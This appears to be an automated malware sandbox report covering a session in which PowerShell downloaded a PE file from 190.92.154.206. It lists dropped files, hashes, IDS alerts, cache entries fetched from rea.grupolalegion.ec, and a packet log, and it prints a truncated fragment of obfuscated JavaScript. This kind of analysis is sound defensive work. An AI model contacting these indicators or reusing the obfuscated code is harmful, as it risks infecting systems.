SHA-256:	B279EC7853615692D06CFF692F03062B89CAFF70D76B08AD9F9ABF9C160660E9
SHA-512:	49BBA6E265D80636F9E4C796A88BC1729B3F9A7A293B46EDD01B01D6A01BBE8F5EDD956E8BBE23BE36663DA8784EB7C02809B744DBD93D1F1F0A2FF3B5D66D99
Malicious:	false
Reputation:	low
Preview:	@...e................................................@..........P................1]...E...........(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...\|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesL.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.H................WY..2.M.&..g(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2h5c3gxp.mgp.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	low
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qhk1cmkw.sfk.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	low
Preview:	# PowerShell test file to determine AppLocker lockdown mode

Chrome Cache Entry: 58

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (7901), with no line terminators
Category:	dropped
Size (bytes):	7901
Entropy (8bit):	5.731855965219842
Encrypted:	false
SSDEEP:	192:HkSx0WYqdTqHMd28ZNRGZkQxXV9ACSpyLrSEa9sSkStiSvlIJQsQsJJgOSgxypJ:HkSx/dTqsRNcZkQxXVuCswrSEa9sOtiQ
MD5:	D6354873E4E824EE66C360997642EA15
SHA1:	F16C1E3E2828766058C3DFCAFE19F07836E6EAD0
SHA-256:	34A1149B16D38AB360978D13E576FA47DFC744F62F522991F4474F55537D3189
SHA-512:	85AE6C79E881F88BDF55B0A7CA55E47FE8753D827676C174189170C4161325EB4CBD06032533158BD9248B6EB75A3AA29E0371829B9ADED2AFE6909120DA91B7
Malicious:	false
Reputation:	low
Preview:	!function($,x){function n($,x,n,r){return _0x2437(n-499,$)}function r($,x,n,r){return _0x2437($-605,r)}for(var t=$();;)try{if(parseInt(r(1086,1069,1080,1097))/1+parseInt(n(951,929,958,954))/2+-parseInt(r(1130,1114,1113,1096))/3(-parseInt(r(1084,1065,1098,1090))/4)+-parseInt(r(1106,1132,1141,1087))/5(-parseInt(r(1131,1127,1101,1158))/6)+parseInt(n(1026,985,1013,1033))/7+-parseInt(n(960,976,992,972))/8+-parseInt(n(965,947,959,926))/9*(parseInt(n(1050,985,1018,988))/10)==380790)break;t.push(t.shift())}catch(c){t.push(t.shift())}}(_0xd7d5,380790);var _0x37d22e=function(){var $={};$.KVbgB=function($,x){return $===x},$[n(827,887,857,860)]=_0x2437(485,685);var x=$;function n($,x,n,r){return _0x2437(n-340,$)}var r=!0;return function($,t){function c($,x,r,t){return n($,x-356,t-529,t-343)}function e($,x,r,t){return n($,x-203,x- -726,t-230)}if(x[e(97,127,139,99)](c(1355,1367,1327,1354),x[c(1405,1416,1384,1386)])){var u=r?function(){if(t){var x=t[e(1513,130,1272,1378)]($,arguments);return t=null

Chrome Cache Entry: 59

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	data
Category:	downloaded
Size (bytes):	16693
Entropy (8bit):	7.9822121290891
Encrypted:	false
SSDEEP:	384:yvlj/jIENdfcpII91L9x411tJgIWONENfY:yvlbjI2gIIHhx41LWfOcfY
MD5:	44AC81CE6B76C21357C076666B6FEC52
SHA1:	F1C4C5FE5624A8AEA3AB09E83002890FD41A22B9
SHA-256:	5516FE7A3CBC7D648E00A806B055A96B82962E51DE30E9791BF07D2139128A4F
SHA-512:	D814BEED1A34913ED5C6181A1BD7FEBEB6D367C1A23E395C56986D126FBC09DA5B60CA3F5FA17E4BC6F5839A833BD38566691990E10B348D5DF65B98B3A473E7
Malicious:	false
Reputation:	low
URL:	https://rea.grupolalegion.ec/p.php/1
Preview:	.....q...s..QM..P.H.`..?...G.0...N..lHY.pi..4;f...G.....$l#.4B.K.E.-.RZ..J.....T.0J`...E.+.<J....".\F..n..b.47,.$b$dxr....k..s.._YQZ...\..%...A..h.Y.6.x.0.N...j....x6d.}.E. b.b....TS.S..?........r....;.~..#4j2.......?..)...Ze.^.........%.e/.. ...o..k.m.lo....4.9...W}.ty.W....@J.,.....k...h(.@.y..}.....D............!K.../}^0....j.b.9..s)..bI...g...k......h&.\|...f.#T.x`..W.?@...!IR.d..%d...~y.xZo3..{..j.b..4G\O.y..R`......}4x[1.-..o.}.Z...zZ~0...z....-/..G..gQj.....I.y....V8ZS...:........~...D...Z........?.'l..iL]....?a.OX..o.vn.O.g...O./Z....Y].p...X...{.Z..D...........>..t2........n..3w2...d.#<U...5U;..{.QRr....f....;..~....Z............p.5.nG...C..E.i.m....W..U..m...\|2...........[....]....^.-.$%.#F}.m...L. Gc.....-..r. ............l..%.X4w5.S...,Mgc{.......k../zM.-...m....'.@..(.Q....d*.Y...Gu4'.T.f6...TZ2....:....z.o....=.yI..I.1....Z...T&kUu..R....Z..M.%3............{..-C.TxE$y9..[./.;)..b.5......F..+Uu..Sr15A.1$..).REJ.^b...&R.....[..d.

Chrome Cache Entry: 60

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	data
Category:	downloaded
Size (bytes):	4088
Entropy (8bit):	7.940787472504943
Encrypted:	false
SSDEEP:	96:HX2n1UmFZJxIoxwkEtRIJTgp2cActvo7O:eFFZXnnggcdt9
MD5:	79156BCDF4E09E197845FD942028C712
SHA1:	7BE168EDCAE2F067B7CF411B1260FD0D47EB88F6
SHA-256:	CC58C3BD09066C96958401A61F44F73536A7BC56593237CA26AB5108F431B007
SHA-512:	BB26A6BCE8E88E19A9F573D3C738AC8F779CB74E40EF1E994AE1831E3785528255697BC19A238C598A93C58A3E2E4F5019C381F671A99501729CE9567DD79953
Malicious:	false
Reputation:	low
URL:	https://rea.grupolalegion.ec/p.php/1?js
Preview:	..#.rV.C.4R......\t..V...g._......YV.86..1.q.Y...NW.?.....@.T.).B.k..A.."....,.k....}.J.hDm5.........M..9........c....p...m..HM.9....D...+..H.I.?..>.1..$..z2.F..g.5.O.PW.A{.j...F.R-.j.n...E..t. .2H'..9uL..>T/.'d..}B.N.csX..LV.........:.....ur .<H.t.&..S.>..@d....t.J..."K 2.D.@.R.A.-"m.r. m...U.8...z..F..9..h.:N}.Gv..gd..:....>..VsC.rJJ..V.6.Z....b<..]......m7J....7.F.771..6q.!.-...p....cZ....j8.\|?/.....).....<..U/..H)"......\.K.!y.+?.X.2.:]g....~...v....0..7....Ko2..:...i.:;.-..&`,..j.vr.Z.#..h3rV.l$Y.A6D.m=G.......9. ....j..;...PF.o;96.&..V.'..l...T-.v\|...t.~wq.i.ODf...e.G....RO..u.U...m.u.huuuq.i}M....\...W...y.....1-.h.r....5:..@M..?..2.....Ne..B.......{I.....d<....8.....X...~!.$.r.Q. c2.rP.TG?BS....d....@&*..A..$.. .m#....m.\|.. c.:,.......B.:.2..%U.aTs.Y9..-.d...).Ei.C.f-Yr.N.Y5y.......8.0.Y.}..yO...}9.H........G..C..!.........<.@...\|J...D5...i....V5./?..;- .Q.M.. h.@Q..t...h..e..=...>...F.j....l..}...:.$..$..K.,z ....=.MR..eH.1

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-03-07T11:48:30.120254+0100	1810000	Joe Security ANOMALY Windows PowerShell HTTP activity	2	192.168.2.7	49725	190.92.154.206	443	TCP
2025-03-07T11:48:30.233854+0100	1810003	Joe Security ANOMALY Windows PowerShell HTTP PE File Download	2	190.92.154.206	443	192.168.2.7	49725	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 7, 2025 11:47:53.323460102 CET	49671	443	192.168.2.7	204.79.197.203
Mar 7, 2025 11:47:54.526717901 CET	49671	443	192.168.2.7	204.79.197.203
Mar 7, 2025 11:47:55.011146069 CET	49674	443	192.168.2.7	104.98.116.138
Mar 7, 2025 11:47:55.011240005 CET	49675	443	192.168.2.7	104.98.116.138
Mar 7, 2025 11:47:55.182889938 CET	49672	443	192.168.2.7	104.98.116.138
Mar 7, 2025 11:47:56.932831049 CET	49671	443	192.168.2.7	204.79.197.203
Mar 7, 2025 11:48:01.114779949 CET	49677	443	192.168.2.7	20.50.201.200
Mar 7, 2025 11:48:01.511131048 CET	49677	443	192.168.2.7	20.50.201.200
Mar 7, 2025 11:48:01.772583961 CET	49671	443	192.168.2.7	204.79.197.203
Mar 7, 2025 11:48:02.308223963 CET	49677	443	192.168.2.7	20.50.201.200
Mar 7, 2025 11:48:03.808087111 CET	49677	443	192.168.2.7	20.50.201.200
Mar 7, 2025 11:48:04.621078968 CET	49675	443	192.168.2.7	104.98.116.138
Mar 7, 2025 11:48:04.621081114 CET	49674	443	192.168.2.7	104.98.116.138
Mar 7, 2025 11:48:04.783617020 CET	49672	443	192.168.2.7	104.98.116.138
Mar 7, 2025 11:48:06.098299026 CET	49706	443	192.168.2.7	142.250.186.36
Mar 7, 2025 11:48:06.098321915 CET	443	49706	142.250.186.36	192.168.2.7
Mar 7, 2025 11:48:06.098568916 CET	49706	443	192.168.2.7	142.250.186.36
Mar 7, 2025 11:48:06.098790884 CET	49706	443	192.168.2.7	142.250.186.36
Mar 7, 2025 11:48:06.098805904 CET	443	49706	142.250.186.36	192.168.2.7
Mar 7, 2025 11:48:06.791970015 CET	49677	443	192.168.2.7	20.50.201.200
Mar 7, 2025 11:48:07.185745955 CET	49708	443	192.168.2.7	190.92.154.206
Mar 7, 2025 11:48:07.185842037 CET	443	49708	190.92.154.206	192.168.2.7
Mar 7, 2025 11:48:07.186033010 CET	49708	443	192.168.2.7	190.92.154.206
Mar 7, 2025 11:48:07.186460972 CET	49709	443	192.168.2.7	190.92.154.206
Mar 7, 2025 11:48:07.186516047 CET	443	49709	190.92.154.206	192.168.2.7
Mar 7, 2025 11:48:07.186660051 CET	49709	443	192.168.2.7	190.92.154.206
Mar 7, 2025 11:48:07.190785885 CET	49709	443	192.168.2.7	190.92.154.206
Mar 7, 2025 11:48:07.190820932 CET	443	49709	190.92.154.206	192.168.2.7
Mar 7, 2025 11:48:07.195578098 CET	49708	443	192.168.2.7	190.92.154.206
Mar 7, 2025 11:48:07.195612907 CET	443	49708	190.92.154.206	192.168.2.7
Mar 7, 2025 11:48:07.217328072 CET	443	49698	104.98.116.138	192.168.2.7
Mar 7, 2025 11:48:07.217432022 CET	49698	443	192.168.2.7	104.98.116.138
Mar 7, 2025 11:48:07.856081009 CET	443	49706	142.250.186.36	192.168.2.7
Mar 7, 2025 11:48:07.881345034 CET	49706	443	192.168.2.7	142.250.186.36
Mar 7, 2025 11:48:07.881356955 CET	443	49706	142.250.186.36	192.168.2.7
Mar 7, 2025 11:48:07.882896900 CET	443	49706	142.250.186.36	192.168.2.7
Mar 7, 2025 11:48:07.882980108 CET	49706	443	192.168.2.7	142.250.186.36
Mar 7, 2025 11:48:07.991606951 CET	49706	443	192.168.2.7	142.250.186.36
Mar 7, 2025 11:48:07.991770029 CET	443	49706	142.250.186.36	192.168.2.7
Mar 7, 2025 11:48:08.036755085 CET	49706	443	192.168.2.7	142.250.186.36
Mar 7, 2025 11:48:08.036772013 CET	443	49706	142.250.186.36	192.168.2.7
Mar 7, 2025 11:48:08.080526114 CET	49706	443	192.168.2.7	142.250.186.36
Mar 7, 2025 11:48:11.388904095 CET	49671	443	192.168.2.7	204.79.197.203
Mar 7, 2025 11:48:12.746845961 CET	49677	443	192.168.2.7	20.50.201.200
Mar 7, 2025 11:48:12.803432941 CET	443	49708	190.92.154.206	192.168.2.7
Mar 7, 2025 11:48:12.807405949 CET	443	49708	190.92.154.206	192.168.2.7
Mar 7, 2025 11:48:12.807508945 CET	49708	443	192.168.2.7	190.92.154.206
Mar 7, 2025 11:48:12.807575941 CET	443	49708	190.92.154.206	192.168.2.7
Mar 7, 2025 11:48:12.814910889 CET	49708	443	192.168.2.7	190.92.154.206
Mar 7, 2025 11:48:12.814949989 CET	443	49708	190.92.154.206	192.168.2.7
Mar 7, 2025 11:48:12.815222979 CET	49708	443	192.168.2.7	190.92.154.206
Mar 7, 2025 11:48:12.815234900 CET	443	49708	190.92.154.206	192.168.2.7
Mar 7, 2025 11:48:12.815390110 CET	49708	443	192.168.2.7	190.92.154.206
Mar 7, 2025 11:48:12.815401077 CET	443	49708	190.92.154.206	192.168.2.7
Mar 7, 2025 11:48:12.849324942 CET	443	49709	190.92.154.206	192.168.2.7
Mar 7, 2025 11:48:12.853292942 CET	443	49709	190.92.154.206	192.168.2.7
Mar 7, 2025 11:48:12.853359938 CET	49709	443	192.168.2.7	190.92.154.206
Mar 7, 2025 11:48:12.853377104 CET	443	49709	190.92.154.206	192.168.2.7
Mar 7, 2025 11:48:12.853827000 CET	49709	443	192.168.2.7	190.92.154.206
Mar 7, 2025 11:48:12.853842974 CET	443	49709	190.92.154.206	192.168.2.7
Mar 7, 2025 11:48:13.247672081 CET	443	49708	190.92.154.206	192.168.2.7
Mar 7, 2025 11:48:13.248198032 CET	49708	443	192.168.2.7	190.92.154.206
Mar 7, 2025 11:48:13.248254061 CET	443	49708	190.92.154.206	192.168.2.7
Mar 7, 2025 11:48:13.254117966 CET	443	49708	190.92.154.206	192.168.2.7
Mar 7, 2025 11:48:13.254200935 CET	49708	443	192.168.2.7	190.92.154.206
Mar 7, 2025 11:48:13.254226923 CET	443	49708	190.92.154.206	192.168.2.7
Mar 7, 2025 11:48:13.264600039 CET	443	49708	190.92.154.206	192.168.2.7
Mar 7, 2025 11:48:13.264692068 CET	49708	443	192.168.2.7	190.92.154.206
Mar 7, 2025 11:48:13.264703989 CET	443	49708	190.92.154.206	192.168.2.7
Mar 7, 2025 11:48:13.264816999 CET	49708	443	192.168.2.7	190.92.154.206
Mar 7, 2025 11:48:13.271013975 CET	443	49708	190.92.154.206	192.168.2.7
Mar 7, 2025 11:48:13.271161079 CET	443	49708	190.92.154.206	192.168.2.7
Mar 7, 2025 11:48:13.271225929 CET	49708	443	192.168.2.7	190.92.154.206
Mar 7, 2025 11:48:13.278058052 CET	443	49708	190.92.154.206	192.168.2.7
Mar 7, 2025 11:48:13.278162003 CET	49708	443	192.168.2.7	190.92.154.206
Mar 7, 2025 11:48:13.284776926 CET	443	49708	190.92.154.206	192.168.2.7
Mar 7, 2025 11:48:13.284856081 CET	49708	443	192.168.2.7	190.92.154.206
Mar 7, 2025 11:48:13.284872055 CET	443	49708	190.92.154.206	192.168.2.7
Mar 7, 2025 11:48:13.284935951 CET	49708	443	192.168.2.7	190.92.154.206
Mar 7, 2025 11:48:13.343815088 CET	443	49708	190.92.154.206	192.168.2.7
Mar 7, 2025 11:48:13.388704062 CET	49708	443	192.168.2.7	190.92.154.206
Mar 7, 2025 11:48:13.570424080 CET	49708	443	192.168.2.7	190.92.154.206
Mar 7, 2025 11:48:13.616318941 CET	443	49708	190.92.154.206	192.168.2.7
Mar 7, 2025 11:48:13.914422035 CET	443	49708	190.92.154.206	192.168.2.7
Mar 7, 2025 11:48:13.916788101 CET	443	49708	190.92.154.206	192.168.2.7
Mar 7, 2025 11:48:13.916910887 CET	49708	443	192.168.2.7	190.92.154.206
Mar 7, 2025 11:48:13.916959047 CET	443	49708	190.92.154.206	192.168.2.7
Mar 7, 2025 11:48:13.961384058 CET	49708	443	192.168.2.7	190.92.154.206
Mar 7, 2025 11:48:13.961487055 CET	443	49708	190.92.154.206	192.168.2.7
Mar 7, 2025 11:48:14.186141968 CET	49718	443	192.168.2.7	190.92.154.206
Mar 7, 2025 11:48:14.186182976 CET	443	49718	190.92.154.206	192.168.2.7
Mar 7, 2025 11:48:14.186275959 CET	49718	443	192.168.2.7	190.92.154.206
Mar 7, 2025 11:48:14.186743975 CET	49718	443	192.168.2.7	190.92.154.206
Mar 7, 2025 11:48:14.186752081 CET	443	49718	190.92.154.206	192.168.2.7
Mar 7, 2025 11:48:15.670701027 CET	49698	443	192.168.2.7	104.98.116.138
Mar 7, 2025 11:48:15.674529076 CET	49720	443	192.168.2.7	104.98.116.138
Mar 7, 2025 11:48:15.674576044 CET	443	49720	104.98.116.138	192.168.2.7
Mar 7, 2025 11:48:15.674798012 CET	49720	443	192.168.2.7	104.98.116.138
Mar 7, 2025 11:48:15.675049067 CET	49720	443	192.168.2.7	104.98.116.138
Mar 7, 2025 11:48:15.675060987 CET	443	49720	104.98.116.138	192.168.2.7
Mar 7, 2025 11:48:15.675950050 CET	443	49698	104.98.116.138	192.168.2.7
Mar 7, 2025 11:48:16.005724907 CET	443	49708	190.92.154.206	192.168.2.7
Mar 7, 2025 11:48:16.059427023 CET	49708	443	192.168.2.7	190.92.154.206
Mar 7, 2025 11:48:18.199960947 CET	443	49706	142.250.186.36	192.168.2.7
Mar 7, 2025 11:48:18.200045109 CET	443	49706	142.250.186.36	192.168.2.7
Mar 7, 2025 11:48:18.200151920 CET	49706	443	192.168.2.7	142.250.186.36
Mar 7, 2025 11:48:18.538427114 CET	443	49718	190.92.154.206	192.168.2.7
Mar 7, 2025 11:48:18.538765907 CET	49718	443	192.168.2.7	190.92.154.206
Mar 7, 2025 11:48:18.538779974 CET	443	49718	190.92.154.206	192.168.2.7
Mar 7, 2025 11:48:18.539659023 CET	443	49718	190.92.154.206	192.168.2.7
Mar 7, 2025 11:48:18.539800882 CET	49718	443	192.168.2.7	190.92.154.206
Mar 7, 2025 11:48:18.540992022 CET	49718	443	192.168.2.7	190.92.154.206
Mar 7, 2025 11:48:18.541052103 CET	443	49718	190.92.154.206	192.168.2.7
Mar 7, 2025 11:48:18.541218042 CET	49718	443	192.168.2.7	190.92.154.206
Mar 7, 2025 11:48:18.588354111 CET	443	49718	190.92.154.206	192.168.2.7
Mar 7, 2025 11:48:18.590272903 CET	49718	443	192.168.2.7	190.92.154.206
Mar 7, 2025 11:48:18.590281963 CET	443	49718	190.92.154.206	192.168.2.7
Mar 7, 2025 11:48:18.637059927 CET	49718	443	192.168.2.7	190.92.154.206
Mar 7, 2025 11:48:18.982199907 CET	443	49718	190.92.154.206	192.168.2.7
Mar 7, 2025 11:48:18.993021011 CET	443	49718	190.92.154.206	192.168.2.7
Mar 7, 2025 11:48:18.993030071 CET	443	49718	190.92.154.206	192.168.2.7
Mar 7, 2025 11:48:18.993053913 CET	443	49718	190.92.154.206	192.168.2.7
Mar 7, 2025 11:48:18.993091106 CET	443	49718	190.92.154.206	192.168.2.7
Mar 7, 2025 11:48:18.993135929 CET	49718	443	192.168.2.7	190.92.154.206
Mar 7, 2025 11:48:18.993135929 CET	49718	443	192.168.2.7	190.92.154.206
Mar 7, 2025 11:48:18.993365049 CET	49718	443	192.168.2.7	190.92.154.206
Mar 7, 2025 11:48:18.994690895 CET	49718	443	192.168.2.7	190.92.154.206
Mar 7, 2025 11:48:18.994709015 CET	443	49718	190.92.154.206	192.168.2.7
Mar 7, 2025 11:48:19.007885933 CET	49706	443	192.168.2.7	142.250.186.36
Mar 7, 2025 11:48:19.007894993 CET	443	49706	142.250.186.36	192.168.2.7
Mar 7, 2025 11:48:23.827322006 CET	443	49720	104.98.116.138	192.168.2.7
Mar 7, 2025 11:48:23.827426910 CET	49720	443	192.168.2.7	104.98.116.138
Mar 7, 2025 11:48:24.235790014 CET	49724	443	192.168.2.7	190.92.154.206
Mar 7, 2025 11:48:24.235846043 CET	443	49724	190.92.154.206	192.168.2.7
Mar 7, 2025 11:48:24.235934019 CET	49724	443	192.168.2.7	190.92.154.206
Mar 7, 2025 11:48:24.248012066 CET	49724	443	192.168.2.7	190.92.154.206
Mar 7, 2025 11:48:24.248028994 CET	443	49724	190.92.154.206	192.168.2.7
Mar 7, 2025 11:48:24.665774107 CET	49677	443	192.168.2.7	20.50.201.200
Mar 7, 2025 11:48:25.778280020 CET	443	49724	190.92.154.206	192.168.2.7
Mar 7, 2025 11:48:25.778369904 CET	49724	443	192.168.2.7	190.92.154.206
Mar 7, 2025 11:48:25.825123072 CET	49724	443	192.168.2.7	190.92.154.206
Mar 7, 2025 11:48:25.825145006 CET	443	49724	190.92.154.206	192.168.2.7
Mar 7, 2025 11:48:25.825468063 CET	443	49724	190.92.154.206	192.168.2.7
Mar 7, 2025 11:48:25.825577021 CET	49724	443	192.168.2.7	190.92.154.206
Mar 7, 2025 11:48:25.829067945 CET	49724	443	192.168.2.7	190.92.154.206
Mar 7, 2025 11:48:25.872329950 CET	443	49724	190.92.154.206	192.168.2.7
Mar 7, 2025 11:48:26.855413914 CET	443	49724	190.92.154.206	192.168.2.7
Mar 7, 2025 11:48:26.855516911 CET	49724	443	192.168.2.7	190.92.154.206
Mar 7, 2025 11:48:26.855526924 CET	443	49724	190.92.154.206	192.168.2.7
Mar 7, 2025 11:48:26.855575085 CET	49724	443	192.168.2.7	190.92.154.206
Mar 7, 2025 11:48:26.857537985 CET	49724	443	192.168.2.7	190.92.154.206
Mar 7, 2025 11:48:26.857635975 CET	443	49724	190.92.154.206	192.168.2.7
Mar 7, 2025 11:48:26.857748032 CET	49724	443	192.168.2.7	190.92.154.206
Mar 7, 2025 11:48:27.992499113 CET	49725	443	192.168.2.7	190.92.154.206
Mar 7, 2025 11:48:27.992604017 CET	443	49725	190.92.154.206	192.168.2.7
Mar 7, 2025 11:48:27.992691040 CET	49725	443	192.168.2.7	190.92.154.206
Mar 7, 2025 11:48:28.013520956 CET	49725	443	192.168.2.7	190.92.154.206
Mar 7, 2025 11:48:28.013566971 CET	443	49725	190.92.154.206	192.168.2.7
Mar 7, 2025 11:48:29.687735081 CET	443	49725	190.92.154.206	192.168.2.7
Mar 7, 2025 11:48:29.687818050 CET	49725	443	192.168.2.7	190.92.154.206
Mar 7, 2025 11:48:29.690006971 CET	49725	443	192.168.2.7	190.92.154.206
Mar 7, 2025 11:48:29.690021038 CET	443	49725	190.92.154.206	192.168.2.7
Mar 7, 2025 11:48:29.690258980 CET	443	49725	190.92.154.206	192.168.2.7
Mar 7, 2025 11:48:29.699449062 CET	49725	443	192.168.2.7	190.92.154.206
Mar 7, 2025 11:48:29.744328022 CET	443	49725	190.92.154.206	192.168.2.7
Mar 7, 2025 11:48:30.120260954 CET	443	49725	190.92.154.206	192.168.2.7
Mar 7, 2025 11:48:30.168499947 CET	49725	443	192.168.2.7	190.92.154.206
Mar 7, 2025 11:48:30.214035034 CET	443	49725	190.92.154.206	192.168.2.7
Mar 7, 2025 11:48:30.214042902 CET	443	49725	190.92.154.206	192.168.2.7
Mar 7, 2025 11:48:30.214085102 CET	443	49725	190.92.154.206	192.168.2.7
Mar 7, 2025 11:48:30.214099884 CET	443	49725	190.92.154.206	192.168.2.7
Mar 7, 2025 11:48:30.214114904 CET	49725	443	192.168.2.7	190.92.154.206
Mar 7, 2025 11:48:30.214123964 CET	443	49725	190.92.154.206	192.168.2.7
Mar 7, 2025 11:48:30.214142084 CET	443	49725	190.92.154.206	192.168.2.7
Mar 7, 2025 11:48:30.214159966 CET	49725	443	192.168.2.7	190.92.154.206
Mar 7, 2025 11:48:30.214191914 CET	49725	443	192.168.2.7	190.92.154.206
Mar 7, 2025 11:48:30.233866930 CET	443	49725	190.92.154.206	192.168.2.7
Mar 7, 2025 11:48:30.233881950 CET	443	49725	190.92.154.206	192.168.2.7
Mar 7, 2025 11:48:30.233933926 CET	49725	443	192.168.2.7	190.92.154.206
Mar 7, 2025 11:48:30.233942032 CET	443	49725	190.92.154.206	192.168.2.7
Mar 7, 2025 11:48:30.233972073 CET	49725	443	192.168.2.7	190.92.154.206
Mar 7, 2025 11:48:30.233993053 CET	49725	443	192.168.2.7	190.92.154.206
Mar 7, 2025 11:48:30.293756008 CET	443	49725	190.92.154.206	192.168.2.7
Mar 7, 2025 11:48:30.293795109 CET	443	49725	190.92.154.206	192.168.2.7
Mar 7, 2025 11:48:30.293900013 CET	49725	443	192.168.2.7	190.92.154.206
Mar 7, 2025 11:48:30.293915987 CET	443	49725	190.92.154.206	192.168.2.7
Mar 7, 2025 11:48:30.293967009 CET	49725	443	192.168.2.7	190.92.154.206
Mar 7, 2025 11:48:30.320684910 CET	443	49725	190.92.154.206	192.168.2.7
Mar 7, 2025 11:48:30.320713043 CET	443	49725	190.92.154.206	192.168.2.7
Mar 7, 2025 11:48:30.320766926 CET	49725	443	192.168.2.7	190.92.154.206
Mar 7, 2025 11:48:30.320777893 CET	443	49725	190.92.154.206	192.168.2.7
Mar 7, 2025 11:48:30.320810080 CET	49725	443	192.168.2.7	190.92.154.206
Mar 7, 2025 11:48:30.320827961 CET	49725	443	192.168.2.7	190.92.154.206
Mar 7, 2025 11:48:30.335490942 CET	443	49725	190.92.154.206	192.168.2.7
Mar 7, 2025 11:48:30.335517883 CET	443	49725	190.92.154.206	192.168.2.7
Mar 7, 2025 11:48:30.335576057 CET	49725	443	192.168.2.7	190.92.154.206
Mar 7, 2025 11:48:30.335582972 CET	443	49725	190.92.154.206	192.168.2.7
Mar 7, 2025 11:48:30.335617065 CET	49725	443	192.168.2.7	190.92.154.206
Mar 7, 2025 11:48:30.335635900 CET	49725	443	192.168.2.7	190.92.154.206
Mar 7, 2025 11:48:30.358073950 CET	443	49725	190.92.154.206	192.168.2.7
Mar 7, 2025 11:48:30.358098984 CET	443	49725	190.92.154.206	192.168.2.7
Mar 7, 2025 11:48:30.358144999 CET	49725	443	192.168.2.7	190.92.154.206
Mar 7, 2025 11:48:30.358153105 CET	443	49725	190.92.154.206	192.168.2.7
Mar 7, 2025 11:48:30.358184099 CET	49725	443	192.168.2.7	190.92.154.206
Mar 7, 2025 11:48:30.358203888 CET	49725	443	192.168.2.7	190.92.154.206
Mar 7, 2025 11:48:30.401819944 CET	443	49725	190.92.154.206	192.168.2.7
Mar 7, 2025 11:48:30.401840925 CET	443	49725	190.92.154.206	192.168.2.7
Mar 7, 2025 11:48:30.402801991 CET	49725	443	192.168.2.7	190.92.154.206
Mar 7, 2025 11:48:30.402820110 CET	443	49725	190.92.154.206	192.168.2.7
Mar 7, 2025 11:48:30.402884960 CET	49725	443	192.168.2.7	190.92.154.206
Mar 7, 2025 11:48:30.421425104 CET	443	49725	190.92.154.206	192.168.2.7
Mar 7, 2025 11:48:30.421444893 CET	443	49725	190.92.154.206	192.168.2.7
Mar 7, 2025 11:48:30.421525955 CET	49725	443	192.168.2.7	190.92.154.206
Mar 7, 2025 11:48:30.421544075 CET	443	49725	190.92.154.206	192.168.2.7
Mar 7, 2025 11:48:30.421587944 CET	49725	443	192.168.2.7	190.92.154.206
Mar 7, 2025 11:48:30.424089909 CET	443	49725	190.92.154.206	192.168.2.7
Mar 7, 2025 11:48:30.424108982 CET	443	49725	190.92.154.206	192.168.2.7
Mar 7, 2025 11:48:30.424192905 CET	49725	443	192.168.2.7	190.92.154.206
Mar 7, 2025 11:48:30.424206972 CET	443	49725	190.92.154.206	192.168.2.7
Mar 7, 2025 11:48:30.424284935 CET	49725	443	192.168.2.7	190.92.154.206
Mar 7, 2025 11:48:30.429235935 CET	443	49725	190.92.154.206	192.168.2.7
Mar 7, 2025 11:48:30.429255962 CET	443	49725	190.92.154.206	192.168.2.7
Mar 7, 2025 11:48:30.429342985 CET	49725	443	192.168.2.7	190.92.154.206
Mar 7, 2025 11:48:30.429354906 CET	443	49725	190.92.154.206	192.168.2.7
Mar 7, 2025 11:48:30.429389954 CET	49725	443	192.168.2.7	190.92.154.206
Mar 7, 2025 11:48:30.429409027 CET	49725	443	192.168.2.7	190.92.154.206
Mar 7, 2025 11:48:30.440665007 CET	443	49725	190.92.154.206	192.168.2.7
Mar 7, 2025 11:48:30.440685034 CET	443	49725	190.92.154.206	192.168.2.7
Mar 7, 2025 11:48:30.440787077 CET	49725	443	192.168.2.7	190.92.154.206
Mar 7, 2025 11:48:30.440800905 CET	443	49725	190.92.154.206	192.168.2.7
Mar 7, 2025 11:48:30.440855026 CET	49725	443	192.168.2.7	190.92.154.206
Mar 7, 2025 11:48:30.450376987 CET	443	49725	190.92.154.206	192.168.2.7
